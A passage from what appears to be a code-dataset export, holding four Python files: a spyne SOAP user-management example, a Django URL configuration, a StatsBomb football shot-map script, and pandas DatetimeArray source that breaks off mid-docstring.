filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_106_23214 | #!/usr/bin/env python
# encoding: utf8
#
# Copyright © Burak Arslan <burak at arskom dot com dot tr>,
# Arskom Ltd. http://www.arskom.com.tr
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the owner nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
'''
This example shows how to define and use complex structures
in spyne. This example uses an extremely simple in-memory
dictionary to store the User objects.
'''
import logging
from spyne.application import Application
from spyne.decorator import srpc
from spyne.interface.wsdl import Wsdl11
from spyne.protocol.soap import Soap11
from spyne.service import ServiceBase
from spyne.model.complex import Array
from spyne.model.complex import ComplexModel
from spyne.model.primitive import Integer
from spyne.model.primitive import String
from spyne.server.wsgi import WsgiApplication
from spyne.error import ResourceNotFoundError
user_database = {}
userid_seq = 1
class Permission(ComplexModel):
__namespace__ = "permission"
app = String(values=['library', 'delivery', 'accounting'])
perms = String(min_occurs=1, max_occurs=2, values=['read','write'])
class User(ComplexModel):
__namespace__ = "user"
userid = Integer
username = String
firstname = String
lastname = String
permissions = Array(Permission)
# add superuser to the 'database'
user_database[0] = User(
userid=0,
username='root',
firstname='Super',
lastname='User',
permissions=[
Permission(app='library', perms=['read', 'write']),
Permission(app='delivery', perms=['read', 'write']),
Permission(app='accounting', perms=['read', 'write']),
]
)
class UserManager(ServiceBase):
@srpc(User, _returns=Integer)
def add_user(user):
global user_database
global userid_seq
user.userid = userid_seq
userid_seq = userid_seq + 1
user_database[user.userid] = user
return user.userid
@srpc(_returns=User)
def super_user():
return user_database[0]
@srpc(Integer, _returns=User)
def get_user(userid):
global user_database
# If rely on dict lookup raising KeyError here, you'll return an
# internal error to the client, which tells the client that there's
# something wrong in the server. However in this case, KeyError means
# invalid request, so it's best to return a client error.
# For the HttpRpc case, internal error is 500 whereas
# ResourceNotFoundError is 404.
if not (userid in user_database):
raise ResourceNotFoundError(userid)
return user_database[userid]
@srpc(User)
def modify_user(user):
global user_database
if not (user.userid in user_database):
raise ResourceNotFoundError(user.userid)
user_database[user.userid] = user
@srpc(Integer)
def delete_user(userid):
global user_database
if not (userid in user_database):
raise ResourceNotFoundError(userid)
del user_database[userid]
@srpc(_returns=Array(User))
def list_users():
global user_database
return user_database.values()
if __name__=='__main__':
from wsgiref.simple_server import make_server
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('spyne.protocol.xml').setLevel(logging.DEBUG)
application = Application([UserManager], 'spyne.examples.complex',
interface=Wsdl11(), in_protocol=Soap11(), out_protocol=Soap11())
server = make_server('127.0.0.1', 7789, WsgiApplication(application))
logging.info("listening to http://127.0.0.1:7789")
logging.info("wsdl is at: http://localhost:7789/?wsdl")
server.serve_forever()
|
the-stack_106_23216 |
from django.conf.urls import url
from django.urls import path, include, re_path
from posts.views import post_create,post_detail,post_list,post_update,post_delete
urlpatterns = [
re_path(r'^$',post_list,name='list'),
re_path(r'^create/$',post_create),
re_path(r'^(?P<slug>[\w-]+)/$',post_detail,name='detail'),
re_path(r'^(?P<slug>[\w-]+)/edit/$',post_update,name='update'),
re_path(r'^(?P<slug>[\w-]+)/delete/$',post_delete),
] |
the-stack_106_23217 | #Make a shot map and a pass map using Statsbomb data
#Set match id in match_id_required.
#Function to draw the pitch
import matplotlib.pyplot as plt
import numpy as np
#Size of the pitch in yards (!!!)
pitchLengthX=120
pitchWidthY=80
#ID for England vs Sweden Womens World Cup
match_id_required = 69301
home_team_required ="England Women's"
away_team_required ="Sweden Women's"
# Load in the data
# I took this from https://znstrider.github.io/2018-11-11-Getting-Started-with-StatsBomb-Data/
file_name=str(match_id_required)+'.json'
#Load in all match events
import json
with open('Statsbomb/data/events/'+file_name) as data_file:
#print (mypath+'events/'+file)
data = json.load(data_file)
#get the nested structure into a dataframe
#store the dataframe in a dictionary with the match id as key (remove '.json' from string)
from pandas.io.json import json_normalize
df = json_normalize(data, sep = "_").assign(match_id = file_name[:-5])
#A dataframe of shots
shots = df.loc[df['type_name'] == 'Shot'].set_index('id')
#Draw the pitch
from FCPython import createPitch
(fig,ax) = createPitch(pitchLengthX,pitchWidthY,'yards','gray')
#Plot the shots
for i,shot in shots.iterrows():
x=shot['location'][0]
y=shot['location'][1]
goal=shot['shot_outcome_name']=='Goal'
team_name=shot['team_name']
circleSize=2
#circleSize=np.sqrt(shot['shot_statsbomb_xg']*15)
if (team_name==home_team_required):
if goal:
shotCircle=plt.Circle((x,pitchWidthY-y),circleSize,color="red")
plt.text((x+1),pitchWidthY-y+1,shot['player_name'])
else:
shotCircle=plt.Circle((x,pitchWidthY-y),circleSize,color="red")
shotCircle.set_alpha(.2)
elif (team_name==away_team_required):
if goal:
shotCircle=plt.Circle((pitchLengthX-x,y),circleSize,color="blue")
plt.text((pitchLengthX-x+1),y+1,shot['player_name'])
else:
shotCircle=plt.Circle((pitchLengthX-x,y),circleSize,color="blue")
shotCircle.set_alpha(.2)
ax.add_patch(shotCircle)
plt.text(5,75,away_team_required + ' shots')
plt.text(80,75,home_team_required + ' shots')
fig.set_size_inches(10, 7)
fig.savefig('Output/shots.pdf', dpi=100)
plt.show()
#Exercise:
#1, Create a dataframe of passes which contains all the passes in the match
#2, Plot the start point of every Sweden pass. Attacking left to right.
#3, Plot only passes made by Caroline Seger (she is Sara Caroline Seger in the database)
#4, Plot arrows to show where the passes we
|
the-stack_106_23218 | # -*- coding: utf-8 -*-
from datetime import datetime, time
import warnings
import numpy as np
from pytz import utc
from pandas._libs import lib, tslib
from pandas._libs.tslib import Timestamp, NaT, iNaT
from pandas._libs.tslibs import (
normalize_date,
conversion, fields, timezones,
resolution as libresolution)
from pandas.util._decorators import cache_readonly, Appender
from pandas.errors import PerformanceWarning
from pandas import compat
from pandas.core.dtypes.common import (
_NS_DTYPE,
is_object_dtype,
is_int64_dtype,
is_datetime64tz_dtype,
is_datetime64_dtype)
from pandas.core.dtypes.dtypes import DatetimeTZDtype
from pandas.core.dtypes.missing import isna
from pandas.core.dtypes.generic import ABCIndexClass, ABCSeries
import pandas.core.common as com
from pandas.core.algorithms import checked_add_with_arr
from pandas.core import ops
from pandas.tseries.frequencies import to_offset, get_period_alias
from pandas.tseries.offsets import Tick, generate_range
from pandas.core.arrays import datetimelike as dtl
_midnight = time(0, 0)
def _to_m8(key, tz=None):
"""
Timestamp-like => dt64
"""
if not isinstance(key, Timestamp):
# this also converts strings
key = Timestamp(key, tz=tz)
return np.int64(conversion.pydt_to_i8(key)).view(_NS_DTYPE)
def _field_accessor(name, field, docstring=None):
def f(self):
values = self.asi8
if self.tz is not None:
if self.tz is not utc:
values = self._local_timestamps()
if field in self._bool_ops:
if field.endswith(('start', 'end')):
freq = self.freq
month_kw = 12
if freq:
kwds = freq.kwds
month_kw = kwds.get('startingMonth', kwds.get('month', 12))
result = fields.get_start_end_field(values, field,
self.freqstr, month_kw)
else:
result = fields.get_date_field(values, field)
# these return a boolean by-definition
return result
if field in self._object_ops:
result = fields.get_date_name_field(values, field)
result = self._maybe_mask_results(result, fill_value=None)
else:
result = fields.get_date_field(values, field)
result = self._maybe_mask_results(result, fill_value=None,
convert='float64')
return result
f.__name__ = name
f.__doc__ = docstring
return property(f)
def _dt_array_cmp(cls, op):
"""
Wrap comparison operations to convert datetime-like to datetime64
"""
opname = '__{name}__'.format(name=op.__name__)
nat_result = True if opname == '__ne__' else False
def wrapper(self, other):
meth = getattr(dtl.DatetimeLikeArrayMixin, opname)
if isinstance(other, (datetime, np.datetime64, compat.string_types)):
if isinstance(other, (datetime, np.datetime64)):
# GH#18435 strings get a pass from tzawareness compat
self._assert_tzawareness_compat(other)
try:
other = _to_m8(other, tz=self.tz)
except ValueError:
# string that cannot be parsed to Timestamp
return ops.invalid_comparison(self, other, op)
result = meth(self, other)
if isna(other):
result.fill(nat_result)
elif lib.is_scalar(other):
return ops.invalid_comparison(self, other, op)
else:
if isinstance(other, list):
try:
other = type(self)(other)
except ValueError:
other = np.array(other, dtype=np.object_)
elif not isinstance(other, (np.ndarray, ABCIndexClass, ABCSeries,
DatetimeArrayMixin)):
# Following Timestamp convention, __eq__ is all-False
# and __ne__ is all True, others raise TypeError.
return ops.invalid_comparison(self, other, op)
if is_object_dtype(other):
result = op(self.astype('O'), np.array(other))
o_mask = isna(other)
elif not (is_datetime64_dtype(other) or
is_datetime64tz_dtype(other)):
# e.g. is_timedelta64_dtype(other)
return ops.invalid_comparison(self, other, op)
else:
self._assert_tzawareness_compat(other)
if not hasattr(other, 'asi8'):
# ndarray, Series
other = type(self)(other)
result = meth(self, other)
o_mask = other._isnan
result = com.values_from_object(result)
# Make sure to pass an array to result[...]; indexing with
# Series breaks with older version of numpy
o_mask = np.array(o_mask)
if o_mask.any():
result[o_mask] = nat_result
if self.hasnans:
result[self._isnan] = nat_result
return result
return compat.set_function_name(wrapper, opname, cls)
class DatetimeArrayMixin(dtl.DatetimeLikeArrayMixin):
"""
Assumes that subclass __new__/__init__ defines:
tz
_freq
_data
"""
_typ = "datetimearray"
_bool_ops = ['is_month_start', 'is_month_end',
'is_quarter_start', 'is_quarter_end', 'is_year_start',
'is_year_end', 'is_leap_year']
_object_ops = ['weekday_name', 'freq', 'tz']
# dummy attribute so that datetime.__eq__(DatetimeArray) defers
# by returning NotImplemented
timetuple = None
# ensure that operations with numpy arrays defer to our implementation
__array_priority__ = 1000
# -----------------------------------------------------------------
# Constructors
_attributes = ["freq", "tz"]
_tz = None
_freq = None
@classmethod
def _simple_new(cls, values, freq=None, tz=None, **kwargs):
"""
we require the we have a dtype compat for the values
if we are passed a non-dtype compat, then coerce using the constructor
"""
assert isinstance(values, np.ndarray), type(values)
if values.dtype == 'i8':
# for compat with datetime/timedelta/period shared methods,
# we can sometimes get here with int64 values. These represent
# nanosecond UTC (or tz-naive) unix timestamps
values = values.view('M8[ns]')
assert values.dtype == 'M8[ns]', values.dtype
result = object.__new__(cls)
result._data = values
result._freq = freq
tz = timezones.maybe_get_tz(tz)
result._tz = timezones.tz_standardize(tz)
return result
def __new__(cls, values, freq=None, tz=None, dtype=None):
if tz is None and hasattr(values, 'tz'):
# e.g. DatetimeIndex
tz = values.tz
if freq is None and hasattr(values, "freq"):
# i.e. DatetimeArray, DatetimeIndex
freq = values.freq
freq, freq_infer = dtl.maybe_infer_freq(freq)
# if dtype has an embedded tz, capture it
tz = dtl.validate_tz_from_dtype(dtype, tz)
if isinstance(values, DatetimeArrayMixin):
# extract nanosecond unix timestamps
values = values.asi8
if values.dtype == 'i8':
values = values.view('M8[ns]')
assert isinstance(values, np.ndarray), type(values)
assert is_datetime64_dtype(values) # not yet assured nanosecond
values = conversion.ensure_datetime64ns(values, copy=False)
result = cls._simple_new(values, freq=freq, tz=tz)
if freq_infer:
result.freq = to_offset(result.inferred_freq)
# NB: Among other things not yet ported from the DatetimeIndex
# constructor, this does not call _deepcopy_if_needed
return result
@classmethod
def _generate_range(cls, start, end, periods, freq, tz=None,
normalize=False, ambiguous='raise', closed=None):
periods = dtl.validate_periods(periods)
if freq is None and any(x is None for x in [periods, start, end]):
raise ValueError('Must provide freq argument if no data is '
'supplied')
if com.count_not_none(start, end, periods, freq) != 3:
raise ValueError('Of the four parameters: start, end, periods, '
'and freq, exactly three must be specified')
freq = to_offset(freq)
if start is not None:
start = Timestamp(start)
if end is not None:
end = Timestamp(end)
if start is None and end is None:
if closed is not None:
raise ValueError("Closed has to be None if not both of start"
"and end are defined")
left_closed, right_closed = dtl.validate_endpoints(closed)
start, end, _normalized = _maybe_normalize_endpoints(start, end,
normalize)
tz, _ = _infer_tz_from_endpoints(start, end, tz)
if tz is not None:
# Localize the start and end arguments
start = _maybe_localize_point(
start, getattr(start, 'tz', None), start, freq, tz
)
end = _maybe_localize_point(
end, getattr(end, 'tz', None), end, freq, tz
)
if start and end:
# Make sure start and end have the same tz
start = _maybe_localize_point(
start, start.tz, end.tz, freq, tz
)
end = _maybe_localize_point(
end, end.tz, start.tz, freq, tz
)
if freq is not None:
# TODO: consider re-implementing _cached_range; GH#17914
index = _generate_regular_range(cls, start, end, periods, freq)
if tz is not None and index.tz is None:
arr = conversion.tz_localize_to_utc(
index.asi8,
tz, ambiguous=ambiguous)
index = cls(arr)
# index is localized datetime64 array -> have to convert
# start/end as well to compare
if start is not None:
start = start.tz_localize(tz).asm8
if end is not None:
end = end.tz_localize(tz).asm8
else:
# Create a linearly spaced date_range in local time
arr = np.linspace(start.value, end.value, periods)
index = cls._simple_new(
arr.astype('M8[ns]', copy=False), freq=None, tz=tz
)
if not left_closed and len(index) and index[0] == start:
index = index[1:]
if not right_closed and len(index) and index[-1] == end:
index = index[:-1]
return cls._simple_new(index.asi8, freq=freq, tz=tz)
# -----------------------------------------------------------------
# Descriptive Properties
@property
def _box_func(self):
return lambda x: Timestamp(x, freq=self.freq, tz=self.tz)
@cache_readonly
def dtype(self):
if self.tz is None:
return _NS_DTYPE
return DatetimeTZDtype('ns', self.tz)
@property
def tz(self):
# GH 18595
return self._tz
@tz.setter
def tz(self, value):
# GH 3746: Prevent localizing or converting the index by setting tz
raise AttributeError("Cannot directly set timezone. Use tz_localize() "
"or tz_convert() as appropriate")
@property
def tzinfo(self):
"""
Alias for tz attribute
"""
return self.tz
@property # NB: override with cache_readonly in immutable subclasses
def _timezone(self):
""" Comparable timezone both for pytz / dateutil"""
return timezones.get_timezone(self.tzinfo)
@property
def offset(self):
"""get/set the frequency of the instance"""
msg = ('{cls}.offset has been deprecated and will be removed '
'in a future version; use {cls}.freq instead.'
.format(cls=type(self).__name__))
warnings.warn(msg, FutureWarning, stacklevel=2)
return self.freq
@offset.setter
def offset(self, value):
"""get/set the frequency of the instance"""
msg = ('{cls}.offset has been deprecated and will be removed '
'in a future version; use {cls}.freq instead.'
.format(cls=type(self).__name__))
warnings.warn(msg, FutureWarning, stacklevel=2)
self.freq = value
@property # NB: override with cache_readonly in immutable subclasses
def is_normalized(self):
"""
Returns True if all of the dates are at midnight ("no time")
"""
return conversion.is_date_array_normalized(self.asi8, self.tz)
@property # NB: override with cache_readonly in immutable subclasses
def _resolution(self):
return libresolution.resolution(self.asi8, self.tz)
# ----------------------------------------------------------------
# Array-Like / EA-Interface Methods
def __array__(self, dtype=None):
if is_object_dtype(dtype):
return np.array(list(self), dtype=object)
elif is_int64_dtype(dtype):
return self.asi8
# TODO: warn that conversion may be lossy?
return self._data.view(np.ndarray) # follow Index.__array__
def __iter__(self):
"""
Return an iterator over the boxed values
Yields
-------
tstamp : Timestamp
"""
# convert in chunks of 10k for efficiency
data = self.asi8
length = len(self)
chunksize = 10000
chunks = int(length / chunksize) + 1
for i in range(chunks):
start_i = i * chunksize
end_i = min((i + 1) * chunksize, length)
converted = tslib.ints_to_pydatetime(data[start_i:end_i],
tz=self.tz, freq=self.freq,
box="timestamp")
for v in converted:
yield v
# ----------------------------------------------------------------
# ExtensionArray Interface
@property
def _ndarray_values(self):
return self._data
@Appender(dtl.DatetimeLikeArrayMixin._validate_fill_value.__doc__)
def _validate_fill_value(self, fill_value):
if isna(fill_value):
fill_value = iNaT
elif isinstance(fill_value, (datetime, np.datetime64)):
self._assert_tzawareness_compat(fill_value)
fill_value = Timestamp(fill_value).value
else:
raise ValueError("'fill_value' should be a Timestamp. "
"Got '{got}'.".format(got=fill_value))
return fill_value
# -----------------------------------------------------------------
# Comparison Methods
_create_comparison_method = classmethod(_dt_array_cmp)
def _has_same_tz(self, other):
zzone = self._timezone
# vzone sholdn't be None if value is non-datetime like
if isinstance(other, np.datetime64):
# convert to Timestamp as np.datetime64 doesn't have tz attr
other = Timestamp(other)
vzone = timezones.get_timezone(getattr(other, 'tzinfo', '__no_tz__'))
return zzone == vzone
def _assert_tzawareness_compat(self, other):
# adapted from _Timestamp._assert_tzawareness_compat
other_tz = getattr(other, 'tzinfo', None)
if is_datetime64tz_dtype(other):
# Get tzinfo from Series dtype
other_tz = other.dtype.tz
if other is NaT:
# pd.NaT quacks both aware and naive
pass
elif self.tz is None:
if other_tz is not None:
raise TypeError('Cannot compare tz-naive and tz-aware '
'datetime-like objects.')
elif other_tz is None:
raise TypeError('Cannot compare tz-naive and tz-aware '
'datetime-like objects')
# -----------------------------------------------------------------
# Arithmetic Methods
def _sub_datetime_arraylike(self, other):
"""subtract DatetimeArray/Index or ndarray[datetime64]"""
if len(self) != len(other):
raise ValueError("cannot add indices of unequal length")
if isinstance(other, np.ndarray):
assert is_datetime64_dtype(other)
other = type(self)(other)
if not self._has_same_tz(other):
# require tz compat
raise TypeError("{cls} subtraction must have the same "
"timezones or no timezones"
.format(cls=type(self).__name__))
self_i8 = self.asi8
other_i8 = other.asi8
new_values = checked_add_with_arr(self_i8, -other_i8,
arr_mask=self._isnan)
if self.hasnans or other.hasnans:
mask = (self._isnan) | (other._isnan)
new_values[mask] = iNaT
return new_values.view('timedelta64[ns]')
def _add_offset(self, offset):
assert not isinstance(offset, Tick)
try:
if self.tz is not None:
values = self.tz_localize(None)
else:
values = self
result = offset.apply_index(values)
if self.tz is not None:
result = result.tz_localize(self.tz)
except NotImplementedError:
warnings.warn("Non-vectorized DateOffset being applied to Series "
"or DatetimeIndex", PerformanceWarning)
result = self.astype('O') + offset
return type(self)(result, freq='infer')
def _sub_datetimelike_scalar(self, other):
# subtract a datetime from myself, yielding a ndarray[timedelta64[ns]]
assert isinstance(other, (datetime, np.datetime64))
assert other is not NaT
other = Timestamp(other)
if other is NaT:
return self - NaT
if not self._has_same_tz(other):
# require tz compat
raise TypeError("Timestamp subtraction must have the same "
"timezones or no timezones")
i8 = self.asi8
result = checked_add_with_arr(i8, -other.value,
arr_mask=self._isnan)
result = self._maybe_mask_results(result)
return result.view('timedelta64[ns]')
def _add_delta(self, delta):
"""
Add a timedelta-like, Tick, or TimedeltaIndex-like object
to self, yielding a new DatetimeArray
Parameters
----------
other : {timedelta, np.timedelta64, Tick,
TimedeltaIndex, ndarray[timedelta64]}
Returns
-------
result : DatetimeArray
"""
new_values = dtl.DatetimeLikeArrayMixin._add_delta(self, delta)
return type(self)(new_values, tz=self.tz, freq='infer')
# -----------------------------------------------------------------
# Timezone Conversion and Localization Methods
def _local_timestamps(self):
"""
Convert to an i8 (unix-like nanosecond timestamp) representation
while keeping the local timezone and not using UTC.
This is used to calculate time-of-day information as if the timestamps
were timezone-naive.
"""
return conversion.tz_convert(self.asi8, utc, self.tz)
def tz_convert(self, tz):
"""
Convert tz-aware Datetime Array/Index from one time zone to another.
Parameters
----------
tz : string, pytz.timezone, dateutil.tz.tzfile or None
Time zone for time. Corresponding timestamps would be converted
to this time zone of the Datetime Array/Index. A `tz` of None will
convert to UTC and remove the timezone information.
Returns
-------
normalized : same type as self
Raises
------
TypeError
If Datetime Array/Index is tz-naive.
See Also
--------
DatetimeIndex.tz : A timezone that has a variable offset from UTC.
DatetimeIndex.tz_localize : Localize tz-naive DatetimeIndex to a
given time zone, or remove timezone from a tz-aware DatetimeIndex.
Examples
--------
With the `tz` parameter, we can change the DatetimeIndex
to other time zones:
>>> dti = pd.DatetimeIndex(start='2014-08-01 09:00',
... freq='H', periods=3, tz='Europe/Berlin')
>>> dti
DatetimeIndex(['2014-08-01 09:00:00+02:00',
'2014-08-01 10:00:00+02:00',
'2014-08-01 11:00:00+02:00'],
dtype='datetime64[ns, Europe/Berlin]', freq='H')
>>> dti.tz_convert('US/Central')
DatetimeIndex(['2014-08-01 02:00:00-05:00',
'2014-08-01 03:00:00-05:00',
'2014-08-01 04:00:00-05:00'],
dtype='datetime64[ns, US/Central]', freq='H')
With the ``tz=None``, we can remove the timezone (after converting
to UTC if necessary):
>>> dti = pd.DatetimeIndex(start='2014-08-01 09:00',freq='H',
... periods=3, tz='Europe/Berlin')
>>> dti
DatetimeIndex(['2014-08-01 09:00:00+02:00',
'2014-08-01 10:00:00+02:00',
'2014-08-01 11:00:00+02:00'],
dtype='datetime64[ns, Europe/Berlin]', freq='H')
>>> dti.tz_convert(None)
DatetimeIndex(['2014-08-01 07:00:00',
'2014-08-01 08:00:00',
'2014-08-01 09:00:00'],
dtype='datetime64[ns]', freq='H')
"""
tz = timezones.maybe_get_tz(tz)
if self.tz is None:
# tz naive, use tz_localize
raise TypeError('Cannot convert tz-naive timestamps, use '
'tz_localize to localize')
# No conversion since timestamps are all UTC to begin with
return self._simple_new(self.asi8, tz=tz, freq=self.freq)
def tz_localize(self, tz, ambiguous='raise', nonexistent='raise',
errors=None):
"""
Localize tz-naive Datetime Array/Index to tz-aware
Datetime Array/Index.
This method takes a time zone (tz) naive Datetime Array/Index object
and makes this time zone aware. It does not move the time to another
time zone.
Time zone localization helps to switch from time zone aware to time
zone unaware objects.
Parameters
----------
tz : string, pytz.timezone, dateutil.tz.tzfile or None
Time zone to convert timestamps to. Passing ``None`` will
remove the time zone information preserving local time.
ambiguous : 'infer', 'NaT', bool array, default 'raise'
When clocks moved backward due to DST, ambiguous times may arise.
For example in Central European Time (UTC+01), when going from
03:00 DST to 02:00 non-DST, 02:30:00 local time occurs both at
00:30:00 UTC and at 01:30:00 UTC. In such a situation, the
`ambiguous` parameter dictates how ambiguous times should be
handled.
- 'infer' will attempt to infer fall dst-transition hours based on
order
- bool-ndarray where True signifies a DST time, False signifies a
non-DST time (note that this flag is only applicable for
ambiguous times)
- 'NaT' will return NaT where there are ambiguous times
- 'raise' will raise an AmbiguousTimeError if there are ambiguous
times
nonexistent : 'shift', 'NaT' default 'raise'
A nonexistent time does not exist in a particular timezone
where clocks moved forward due to DST.
- 'shift' will shift the nonexistent times forward to the closest
existing time
- 'NaT' will return NaT where there are nonexistent times
- 'raise' will raise an NonExistentTimeError if there are
nonexistent times
.. versionadded:: 0.24.0
errors : {'raise', 'coerce'}, default None
- 'raise' will raise a NonExistentTimeError if a timestamp is not
valid in the specified time zone (e.g. due to a transition from
or to DST time). Use ``nonexistent='raise'`` instead.
- 'coerce' will return NaT if the timestamp can not be converted
to the specified time zone. Use ``nonexistent='NaT'`` instead.
.. deprecated:: 0.24.0
Returns
-------
result : same type as self
Array/Index converted to the specified time zone.
Raises
------
TypeError
If the Datetime Array/Index is tz-aware and tz is not None.
See Also
--------
DatetimeIndex.tz_convert : Convert tz-aware DatetimeIndex from
one time zone to another.
Examples
--------
>>> tz_naive = pd.date_range('2018-03-01 09:00', periods=3)
>>> tz_naive
DatetimeIndex(['2018-03-01 09:00:00', '2018-03-02 09:00:00',
'2018-03-03 09:00:00'],
dtype='datetime64[ns]', freq='D')
Localize DatetimeIndex in US/Eastern time zone:
>>> tz_aware = tz_naive.tz_localize(tz='US/Eastern')
>>> tz_aware
DatetimeIndex(['2018-03-01 09:00:00-05:00',
'2018-03-02 09:00:00-05:00',
'2018-03-03 09:00:00-05:00'],
dtype='datetime64[ns, US/Eastern]', freq='D')
With the ``tz=None``, we can remove the time zone information
while keeping the local time (not converted to UTC):
>>> tz_aware.tz_localize(None)
DatetimeIndex(['2018-03-01 09:00:00', '2018-03-02 09:00:00',
'2018-03-03 09:00:00'],
dtype='datetime64[ns]', freq='D')
Be careful with DST changes. When there is sequential data, pandas can
infer the DST time:
>>> s = pd.to_datetime(pd.Series([
... '2018-10-28 01:30:00',
... '2018-10-28 02:00:00',
... '2018-10-28 02:30:00',
... '2018-10-28 02:00:00',
... '2018-10-28 02:30:00',
... '2018-10-28 03:00:00',
... '2018-10-28 03:30:00']))
>>> s.dt.tz_localize('CET', ambiguous='infer')
2018-10-28 01:30:00+02:00 0
2018-10-28 02:00:00+02:00 1
2018-10-28 02:30:00+02:00 2
2018-10-28 02:00:00+01:00 3
2018-10-28 02:30:00+01:00 4
2018-10-28 03:00:00+01:00 5
2018-10-28 03:30:00+01:00 6
dtype: int64
In some cases, inferring the DST is impossible. In such cases, you can
pass an ndarray to the ambiguous parameter to set the DST explicitly
>>> s = pd.to_datetime(pd.Series([
... '2018-10-28 01:20:00',
... '2018-10-28 02:36:00',
... '2018-10-28 03:46:00']))
>>> s.dt.tz_localize('CET', ambiguous=np.array([True, True, False]))
0 2018-10-28 01:20:00+02:00
1 2018-10-28 02:36:00+02:00
2 2018-10-28 03:46:00+01:00
dtype: datetime64[ns, CET]
"""
if errors is not None:
warnings.warn("The errors argument is deprecated and will be "
"removed in a future release. Use "
"nonexistent='NaT' or nonexistent='raise' "
"instead.", FutureWarning)
if errors == 'coerce':
nonexistent = 'NaT'
elif errors == 'raise':
nonexistent = 'raise'
else:
raise ValueError("The errors argument must be either 'coerce' "
"or 'raise'.")
if nonexistent not in ('raise', 'NaT', 'shift'):
raise ValueError("The nonexistent argument must be one of 'raise',"
" 'NaT' or 'shift'")
if self.tz is not None:
if tz is None:
new_dates = conversion.tz_convert(self.asi8, 'UTC', self.tz)
else:
raise TypeError("Already tz-aware, use tz_convert to convert.")
else:
tz = timezones.maybe_get_tz(tz)
# Convert to UTC
new_dates = conversion.tz_localize_to_utc(
self.asi8, tz, ambiguous=ambiguous, nonexistent=nonexistent,
)
new_dates = new_dates.view(_NS_DTYPE)
return self._simple_new(new_dates, tz=tz, freq=self.freq)
# ----------------------------------------------------------------
# Conversion Methods - Vectorized analogues of Timestamp methods
def to_pydatetime(self):
"""
Return Datetime Array/Index as object ndarray of datetime.datetime
objects
Returns
-------
datetimes : ndarray
"""
return tslib.ints_to_pydatetime(self.asi8, tz=self.tz)
def normalize(self):
"""
Convert times to midnight.
The time component of the date-time is converted to midnight i.e.
00:00:00. This is useful in cases, when the time does not matter.
Length is unaltered. The timezones are unaffected.
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on Datetime Array/Index.
Returns
-------
DatetimeArray, DatetimeIndex or Series
The same type as the original data. Series will have the same
name and index. DatetimeIndex will have the same name.
See Also
--------
floor : Floor the datetimes to the specified freq.
ceil : Ceil the datetimes to the specified freq.
round : Round the datetimes to the specified freq.
Examples
--------
>>> idx = pd.DatetimeIndex(start='2014-08-01 10:00', freq='H',
... periods=3, tz='Asia/Calcutta')
>>> idx
DatetimeIndex(['2014-08-01 10:00:00+05:30',
'2014-08-01 11:00:00+05:30',
'2014-08-01 12:00:00+05:30'],
dtype='datetime64[ns, Asia/Calcutta]', freq='H')
>>> idx.normalize()
DatetimeIndex(['2014-08-01 00:00:00+05:30',
'2014-08-01 00:00:00+05:30',
'2014-08-01 00:00:00+05:30'],
dtype='datetime64[ns, Asia/Calcutta]', freq=None)
"""
new_values = conversion.normalize_i8_timestamps(self.asi8, self.tz)
return type(self)(new_values, freq='infer').tz_localize(self.tz)
def to_period(self, freq=None):
"""
Cast to PeriodArray/Index at a particular frequency.
Converts DatetimeArray/Index to PeriodArray/Index.
Parameters
----------
freq : string or Offset, optional
One of pandas' :ref:`offset strings <timeseries.offset_aliases>`
or an Offset object. Will be inferred by default.
Returns
-------
PeriodArray/Index
Raises
------
ValueError
When converting a DatetimeArray/Index with non-regular values,
so that a frequency cannot be inferred.
Examples
--------
>>> df = pd.DataFrame({"y": [1,2,3]},
... index=pd.to_datetime(["2000-03-31 00:00:00",
... "2000-05-31 00:00:00",
... "2000-08-31 00:00:00"]))
>>> df.index.to_period("M")
PeriodIndex(['2000-03', '2000-05', '2000-08'],
dtype='period[M]', freq='M')
Infer the daily frequency
>>> idx = pd.date_range("2017-01-01", periods=2)
>>> idx.to_period()
PeriodIndex(['2017-01-01', '2017-01-02'],
dtype='period[D]', freq='D')
See Also
--------
pandas.PeriodIndex: Immutable ndarray holding ordinal values.
pandas.DatetimeIndex.to_pydatetime: Return DatetimeIndex as object.
"""
from pandas.core.arrays import PeriodArray
if self.tz is not None:
warnings.warn("Converting to PeriodArray/Index representation "
"will drop timezone information.", UserWarning)
if freq is None:
freq = self.freqstr or self.inferred_freq
if freq is None:
raise ValueError("You must pass a freq argument as "
"current index has none.")
freq = get_period_alias(freq)
return PeriodArray._from_datetime64(self._data, freq, tz=self.tz)
def to_perioddelta(self, freq):
"""
Calculate TimedeltaArray of difference between index
values and index converted to PeriodArray at specified
freq. Used for vectorized offsets
Parameters
----------
freq: Period frequency
Returns
-------
TimedeltaArray/Index
"""
# TODO: consider privatizing (discussion in GH#23113)
from pandas.core.arrays.timedeltas import TimedeltaArrayMixin
i8delta = self.asi8 - self.to_period(freq).to_timestamp().asi8
m8delta = i8delta.view('m8[ns]')
return TimedeltaArrayMixin(m8delta)
# -----------------------------------------------------------------
# Properties - Vectorized Timestamp Properties/Methods
def month_name(self, locale=None):
"""
Return the month names of the DateTimeIndex with specified locale.
